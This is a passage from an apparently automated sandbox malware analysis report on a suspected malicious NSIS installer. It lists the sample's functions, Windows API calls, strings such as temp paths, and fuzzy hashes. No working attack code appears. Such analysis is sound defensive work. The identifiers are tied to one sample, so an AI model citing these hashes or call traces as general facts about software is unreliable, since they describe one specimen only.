                                                          • MulDiv.KERNEL32(000DAA48,00000064,000DC030), ref: 00402E00
                                                          • wsprintfA.USER32 ref: 00402E10
                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                          • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                          Function 700522F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 70052447
                                                            • Part of subcall function 70051224: lstrcpynA.KERNEL32(00000000,?,700512CF,-7005404B,700511AB,-000000A0), ref: 70051234
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 700523C2
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 700523D7
                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 700523E8
                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 700523F6
                                                          • GlobalFree.KERNEL32(00000000), ref: 700523FD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 3730416702-0
                                                          • Opcode ID: fbe8301c6ab94c5298a5d98807ea82f49dde6e70f7ea9a70413b2b4a2e963efa
                                                          • Instruction ID: c3d5cfdb4ae9a42a9604fbb5f16cc0720bcea92b19c9c9a596843fa3b930657d
                                                          • Opcode Fuzzy Hash: fbe8301c6ab94c5298a5d98807ea82f49dde6e70f7ea9a70413b2b4a2e963efa
                                                          • Instruction Fuzzy Hash: BF415772504300EFE7219F20C844F6EB7E9FF41B31F20481AF546C6291D774AA488BA1
                                                          Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                          • GlobalFree.KERNEL32(?), ref: 0040288E
                                                          • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                          • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                          Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                          • GetClientRect.USER32(?,?), ref: 00401DCC
                                                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                          • DeleteObject.GDI32(00000000), ref: 00401E20
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                          • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                          Function 004049C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • wsprintfA.USER32 ref: 00404A6A
                                                          • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                          • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                          • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                          • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                          Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3355392842
                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                          Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                          • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                          Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,hyaenic Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75A53410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75A53410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-3355392842
                                                          • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                          • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                          Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                            • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                          • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                          Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,75A53410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                          • GlobalFree.KERNEL32(0072BA18), ref: 00403896
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3355392842
                                                          • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                          • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                          Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fbXZ4ErQMU.exe,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405ADC
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fbXZ4ErQMU.exe,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405AEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3370423016
                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                          Function 700510E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 7005115B
                                                          • GlobalFree.KERNEL32(00000000), ref: 700511B4
                                                          • GlobalFree.KERNEL32(?), ref: 700511C7
                                                          • GlobalFree.KERNEL32(?), ref: 700511F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 185198dd8ffaa35b99c79ebbd8d01d8fc4f88fbfdb64dc6cb342dc2d5f4d4016
                                                          • Instruction ID: 1347f2d73197b68438a8ebac6333d9f31fa971365c8e14ec2f73ecfcaeecb8fa
                                                          • Opcode Fuzzy Hash: 185198dd8ffaa35b99c79ebbd8d01d8fc4f88fbfdb64dc6cb342dc2d5f4d4016
                                                          • Instruction Fuzzy Hash: 1A31D0B2404600AFEB018F66DD49FEE7FF9EB05A74B340459FA46C23A0D7749818CB24
                                                          Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
